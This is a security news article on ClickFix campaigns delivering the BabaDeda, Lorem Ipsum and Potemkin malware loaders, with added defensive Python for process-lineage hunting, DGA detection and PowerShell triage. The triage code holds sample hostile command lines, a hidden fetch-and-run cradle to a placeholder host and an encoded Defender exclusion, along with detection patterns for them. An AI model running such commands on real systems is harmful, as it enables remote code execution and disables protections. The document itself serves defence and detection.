
ClickFix Malware Campaigns Deliver BabaDeda, Lorem Ipsum, and Potemkin Loaders

Cybersecurity researchers have uncovered several active ClickFix campaigns distributing three sophisticated malware loaders: BabaDeda Loader, Lorem Ipsum Loader, and Potemkin. Independent investigations by security firms have revealed how threat actors are leveraging social engineering, compromised websites, and modular malware architectures to infect victims across multiple industries.

The campaigns highlight a growing trend among cybercriminals: separating malware delivery, storage, execution, and payload deployment into independent components, making attacks harder to detect and analyze.

BabaDeda Loader Expands Its Capabilities

Researchers observed BabaDeda Loader attacks in April 2026 targeting organizations in the education and financial sectors.

According to security analysts, BabaDeda has evolved from a simple malware delivery framework into a highly flexible loader designed for stealth, evasion, and modular payload deployment.

The attack typically begins with a ClickFix social engineering lure that tricks victims into executing malicious PowerShell commands. Once activated, the loader downloads and deploys additional threats such as information stealers and remote access trojans (RATs).

To evade detection, BabaDeda Loader uses several advanced techniques, including:

  • Hidden PowerShell execution
  • In-memory shellcode loading
  • DLL side-loading
  • External payload storage
  • Security software detection
  • Geographic filtering to avoid Russian and Belarusian systems

The malware ultimately injects its payload into trusted Windows processes such as svchost.exe, helping it blend into normal system activity.

Information-Stealing Capabilities

One of the malware variants delivered through BabaDeda Loader is a .NET-based backdoor capable of collecting extensive system and user information.

Its functionality includes:

  • Gathering system details
  • Discovering browser profiles
  • Stealing cookies, passwords, browsing history, and encryption keys
  • Searching and exfiltrating files
  • Capturing screenshots
  • Executing commands remotely
  • Establishing encrypted communication channels with command-and-control (C2) servers

Researchers also identified another attack chain that deploys DanaBot and SectopRAT using DLL side-loading techniques.

A particularly concerning component, known as Storage Crypter, stores malicious payloads inside seemingly harmless files and only decodes them immediately before execution. This significantly reduces forensic visibility and helps attackers bypass traditional security tools.

ClickFix Campaign Uses Compromised WordPress Sites

In a separate campaign, attackers have been exploiting compromised WordPress websites to distribute a newly discovered malware framework called Lorem Ipsum Loader.

Researchers identified at least five hacked websites across industries such as:

  • Architecture
  • Legal services
  • Construction technology

This campaign marks a shift from previous tactics that relied on fake software download portals promoted through SEO poisoning and malicious advertising.

Security experts believe the malware has been active since February 2026.

Delivery Chain and Infection Process

Victims are presented with fake Microsoft Edge security update prompts designed to mimic legitimate browser notifications.

The malicious process involves:

  1. Running a ClickFix command.
  2. Downloading a ZIP archive.
  3. Installing an outdated version of Node.js.
  4. Executing JavaScript-based malware components.
  5. Establishing persistence through DLL side-loading.
  6. Decoding and launching Lorem Ipsum Loader.
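The chain above leaves a process lineage that a defender can hunt for: a shell started by explorer.exe (the Run dialog a ClickFix lure points the user at), which in turn launches a Node.js interpreter from a user-writable folder rather than an installed location. The following Python is an added example, not code from the article or from any of the researchers it cites; the event records, pids, paths and the list of "user-writable" path fragments are constructed for the example, in the shape of Sysmon process-creation fields.

```python
import ntpath

# Path fragments treated as user-writable. A constructed list for this
# example; the article does not specify where the archive is extracted.
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
                 "\\downloads\\", "\\public\\")
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Constructed process-creation events (pid, parent pid, image path), modelled
# on Sysmon Event ID 1. All values are made up for the example.
EVENTS = [
    {"pid": 4100, "ppid": 1200, "image": r"C:\Windows\explorer.exe"},
    # user pastes the ClickFix command into the Run dialog: explorer -> powershell
    {"pid": 5320, "ppid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    # archive dropped to a temp folder; the bundled interpreter runs from there
    {"pid": 5488, "ppid": 5320,
     "image": r"C:\Users\jdoe\AppData\Local\Temp\edge-update\node.exe"},
    # benign developer activity: cmd from explorer, node from its install path
    {"pid": 7000, "ppid": 4100, "image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 7100, "ppid": 7000, "image": r"C:\Program Files\nodejs\node.exe"},
]


def basename(image):
    return ntpath.basename(image).lower()


def in_user_writable(image):
    low = image.lower()
    return any(marker in low for marker in USER_WRITABLE)


def ancestors(pid, by_pid):
    """Return the process and its ancestors, nearest first, stopping at an
    unknown pid or a cycle (pid reuse in a log can produce one)."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        ev = by_pid[pid]
        chain.append(ev)
        pid = ev["ppid"]
    return chain


def find_suspicious_node_chains(events):
    """Flag node.exe launched from a user-writable folder whose ancestry
    contains a shell that was itself started by explorer.exe."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for ev in events:
        if basename(ev["image"]) != "node.exe" or not in_user_writable(ev["image"]):
            continue
        chain = ancestors(ev["pid"], by_pid)
        # walk (child, parent) pairs above node.exe looking for explorer -> shell
        for shell_ev, parent_ev in zip(chain[1:], chain[2:]):
            if (basename(shell_ev["image"]) in SHELLS
                    and basename(parent_ev["image"]) == "explorer.exe"):
                hits.append({
                    "pid": ev["pid"],
                    "chain": [basename(e["image"]) for e in reversed(chain)],
                })
                break
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_node_chains(EVENTS):
        print(hit["pid"], " > ".join(hit["chain"]))
```

The benign developer case is deliberately included: node.exe launched from its installed location is ignored even though it also descends from explorer.exe, so the rule keys on both the launch path and the lineage rather than on the interpreter name alone.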

Once active, the loader retrieves a secondary backdoor from attacker-controlled social media profiles that host command-and-control information.

Researchers have linked the operation to Vanilla Tempest, a financially motivated threat actor associated with ransomware families including:

  • Rhysida
  • BlackCat
  • Zeppelin
  • Quantum Locker

The campaign demonstrates how cybercriminal groups can rapidly adapt their delivery methods when previous infrastructure becomes ineffective.

Potemkin Loader Delivers EtherRAT and RMMProject

A third ClickFix campaign has been observed deploying a previously undocumented malware loader called Potemkin.

The infection chain begins with a malicious MSI installer that drops an HTML Application (HTA) payload. This payload then installs Potemkin, which serves as a delivery mechanism for:

  • EtherRAT
  • RMMProject

RMMProject is particularly dangerous because it includes modules capable of:

  • Remote screen monitoring
  • Browser credential theft
  • Screenshot capture
  • Arbitrary script execution
  • Browser autofill data extraction
  • Downloading and executing additional malware

Advanced Command-and-Control Features

Potemkin uses a domain generation algorithm (DGA) powered by a built-in dictionary containing over 1,000 words to locate its command-and-control infrastructure.
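Dictionary-based DGAs produce names that look pronounceable, so the usual character-entropy checks miss them; what does stand out is that the registrable label splits cleanly into several dictionary words, and that an infected client burns through many such names that do not resolve. The Python below is an added example of that defensive heuristic, not Potemkin's algorithm and not code from the article: the word list is a small constructed stand-in for the loader's 1,000-plus-word dictionary, the concatenation scheme is assumed, and the DNS log lines are constructed.

```python
from functools import lru_cache

# Constructed stand-in for the loader's built-in dictionary. The real list
# and the way words are joined are not described on the page.
WORDLIST = frozenset({
    "cloud", "secure", "update", "service", "portal", "data", "sync", "net",
    "host", "file", "share", "mail", "box", "drive", "app", "store", "web",
    "safe", "check", "point", "link", "access", "account", "login", "tech",
})

# Constructed resolver log lines: timestamp, client IP, query name, rcode.
DNS_LOG = """\
2026-04-02T10:01:03Z 10.0.8.21 securecloudsync.com NXDOMAIN
2026-04-02T10:01:04Z 10.0.8.21 portaldatahost.net NXDOMAIN
2026-04-02T10:01:05Z 10.0.8.21 fileshareupdate.com NXDOMAIN
2026-04-02T10:01:06Z 10.0.8.21 safecheckpoint.org NOERROR
2026-04-02T10:01:09Z 10.0.8.40 www.microsoft.com NOERROR
2026-04-02T10:01:11Z 10.0.8.40 xk2q9f.example NXDOMAIN
"""


@lru_cache(maxsize=None)
def segment(label):
    """Split a label into the fewest dictionary words that cover it entirely.
    Returns a tuple of words, or None when no complete split exists."""
    if label == "":
        return ()
    best = None
    for i in range(1, len(label) + 1):
        head = label[:i]
        if head in WORDLIST:
            rest = segment(label[i:])
            if rest is not None and (best is None or len(rest) + 1 < len(best)):
                best = (head,) + rest
    return best


def looks_like_dictionary_dga(fqdn, min_words=2):
    """True when the registrable label is entirely made of >= min_words words."""
    labels = fqdn.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return False
    words = segment(labels[-2])  # e.g. "securecloudsync" from securecloudsync.com
    return words is not None and len(words) >= min_words


def analyze(log_text):
    """Per client: dictionary-looking names queried and how many failed."""
    stats = {}
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        _ts, client, qname, rcode = parts
        if not looks_like_dictionary_dga(qname):
            continue
        entry = stats.setdefault(client, {"names": [], "nxdomain": 0})
        entry["names"].append(qname)
        if rcode == "NXDOMAIN":
            entry["nxdomain"] += 1
    return stats


def flagged_clients(log_text, nx_threshold=3):
    """Clients whose dictionary-looking lookups failed at least nx_threshold times."""
    stats = analyze(log_text)
    return sorted(c for c, s in stats.items() if s["nxdomain"] >= nx_threshold)


if __name__ == "__main__":
    for client, s in analyze(DNS_LOG).items():
        print(client, s["nxdomain"], "failed of", len(s["names"]), s["names"])
    print("flagged:", flagged_clients(DNS_LOG))
```

A single multi-word domain proves nothing (plenty of legitimate brands are two dictionary words), which is why the verdict is per client and gated on the NXDOMAIN count: a DGA client queries candidates until one resolves, and the failed candidates are the signal. Two-letter labels in a real wordlist would make almost everything segmentable, so drop very short words before using a larger dictionary.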

Additional features include:

  • Victim identification using unique UUIDs
  • Encrypted communication channels
  • Dynamic task polling
  • In-memory DLL execution
  • Custom encryption methods

Following compromise, attackers have been observed conducting hands-on-keyboard activity, including:

  • Creating Microsoft Defender exclusions
  • Deploying Chisel reverse SOCKS tunnels
  • Performing network reconnaissance
  • Establishing Cloudflare tunnels
  • Moving laterally across networks
  • Propagating EtherRAT to multiple systems

Why ClickFix Continues to Succeed

Despite increased awareness, ClickFix remains one of the most effective social engineering techniques used by cybercriminals today.

The attack relies on a simple but powerful concept: convincing users to manually execute commands under the guise of legitimate troubleshooting or security procedures.

Researchers have observed ClickFix being used to distribute a variety of malware families targeting both Windows and macOS users, including information stealers and backdoors.

Attackers are also exploiting the growing popularity of artificial intelligence tools by distributing fake installers masquerading as AI applications.

Apple Responds with New Security Protections

The continued abuse of command-pasting attacks has prompted Apple to introduce a new security warning in macOS Tahoe 26.4.

The feature alerts users when applications or websites attempt to persuade them to paste commands into the Terminal app, helping prevent accidental execution of malicious instructions.

Apple notes that scammers frequently use websites, chat platforms, email messages, and other communication channels to convince users to run harmful commands that can compromise devices and personal data.

Final Thoughts

The emergence of BabaDeda Loader, Lorem Ipsum Loader, and Potemkin demonstrates how modern malware ecosystems are becoming increasingly modular, stealthy, and resilient.

As threat actors continue to refine ClickFix-based social engineering tactics, organizations must strengthen user awareness training, implement endpoint detection solutions, and closely monitor PowerShell and script execution activities.
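Monitoring PowerShell execution, as recommended above, means looking at the command lines themselves: the hidden-window launches the BabaDeda section lists among its evasion techniques, fetch-and-run cradles, and post-compromise steps such as the Microsoft Defender exclusions created in the Potemkin intrusions, all of which are routinely wrapped in -EncodedCommand. The Python below is an added triage example, not code from the article or from any vendor it cites; the indicator patterns are constructed and will need tuning, and the sample command lines (including the placeholder host update-check.invalid) are made up for the example.

```python
import base64
import re

# Indicator patterns, run over the raw command line and over any decoded
# -EncodedCommand payload. Constructed for this example; tune to your estate.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "execution_policy_bypass": re.compile(r"-e(?:p|xecutionpolicy)?\s+bypass", re.I),
    "download_cradle": re.compile(
        r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient|\bcurl\b",
        re.I),
    "invoke_expression": re.compile(r"invoke-expression|\biex\b", re.I),
    "defender_exclusion": re.compile(r"add-mppreference\s+.*-exclusion", re.I),
}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def _encode(ps):
    """Build an encoded-command argument the way PowerShell expects it
    (base64 over UTF-16LE); used only to construct the sample below."""
    return base64.b64encode(ps.encode("utf-16le")).decode("ascii")


# Constructed sample command lines, as logged by Sysmon Event 1 / Security 4688.
SAMPLE_CMDLINES = [
    # ClickFix-style launch: hidden window, policy bypass, fetch and run
    'powershell.exe -w hidden -ep bypass -c "iwr https://update-check.invalid/edge.txt | iex"',
    # hands-on-keyboard step from the Potemkin intrusions, hidden behind encoding
    "powershell.exe -nop -enc " + _encode(r"Add-MpPreference -ExclusionPath C:\Users\Public"),
    # benign administrative command
    'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Logs"',
]


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind an -EncodedCommand argument, or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline):
    """Indicators found in the raw line plus its decoded payload, if any."""
    decoded = decode_encoded_command(cmdline)
    found = set()
    if decoded is not None:
        found.add("encoded_command")
    for text in (cmdline, decoded or ""):
        for name, pattern in INDICATORS.items():
            if pattern.search(text):
                found.add(name)
    return {"indicators": sorted(found), "decoded": decoded}


def triage(cmdlines, min_indicators=2):
    """Keep command lines that trip at least min_indicators patterns."""
    results = []
    for c in cmdlines:
        r = analyze(c)
        if len(r["indicators"]) >= min_indicators:
            results.append((c, r))
    return results


if __name__ == "__main__":
    for cmd, r in triage(SAMPLE_CMDLINES):
        print(r["indicators"], "<-", r["decoded"] or cmd)
```

Decoding before matching is the part that matters: the Defender-exclusion line carries no indicator at all in its raw form, and only the decoded payload exposes it. Pair this with PowerShell script block logging (Event ID 4104), which records the script after decoding regardless of how it was launched.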

The human element remains the weakest link in many attacks, making security awareness just as important as technical defenses in the fight against modern cyber threats.
